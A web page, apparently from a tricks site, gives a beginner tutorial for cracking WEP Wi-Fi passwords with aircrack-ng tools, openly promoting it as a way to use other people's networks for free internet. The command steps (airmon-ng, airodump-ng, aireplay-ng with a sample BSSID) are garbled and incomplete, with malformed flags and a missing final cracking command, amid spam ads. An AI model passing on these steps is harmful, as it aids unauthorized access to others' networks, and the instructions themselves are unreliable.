watch sexy videos at nza-vids!
www.Airteltrickz.com
Our Official Facebook Group

Earn 2
Earn Online Unlimited Real Money (Proof)

Earn Upto Rs.20 Per Install Using Flipkart (Proof)

Wifi
The Word Wi-Fi Means Wireless Fidelity has become very popular in today's world because of the affordable price and easy to setup. Most computers sold today in your area you can use to connect to Wi-Fi networks that come with wireless cards already installed. You probably asked yourself some time: "how to hack Wi-Fi password?" Well, you can easily hack Wi-Fi password and can enjoy free internet connection!

Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down.
Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide who will teach even complete beginners how to crack WEP encrypted networks, easily.

Our Wi-Fi network is your conveniently wireless gateway to the internet, and since you're not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right?

Follow Simple steps to do it

Here is what you would require to crack a WEP Key:

1. Backtrack or any other Linux distro with aircrack-ng installed.
2. A Wi-Fi adapter capable of injecting packets,

For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack. You can find compatible Wi-Fi card lists here - Click Here
Open a brand new console and sort within the following commands : ifconfig wlan0 up

· Where wlan0 is the name of the wireless card, it can be different.
· To see all wireless cards connected to your system simply type in "iwconfig ".

· Step 1: Turn on Monitor Mode!!

- To begin, you'll need to first put your wireless adapter into monitor mode,
- Monitor mode is the mode whereby your card can listen to every packet in the air,
- You can put your card into monitor mode by typing in the following commands:
airmon-ng
airmon-ng start wlan0


· Step 2: airodump-ng mon0

· Step 3: airodump-ng -w twan -c 11 -bssid

· C8:3A:35:2F:E7:30 mon0

· Step 4: "aireplay-ng -1 0 -a

· C8:3A:35:2F:E7:30 mon0"

· As a last step we crack WEP key by using captured packets and aircrack-ng command.

· All captured packets are now stored in twan=02.cap file.


NOTE: Do not stop capturing process as you do not know if current amount of captured packed is satisfactory to crack WEP key.

!UC Browser, Faster Download! Click Here!

Disclaimer | Contact Us | Home

© 2010-17 AirtelTrickz.Com™
waplog

U-ON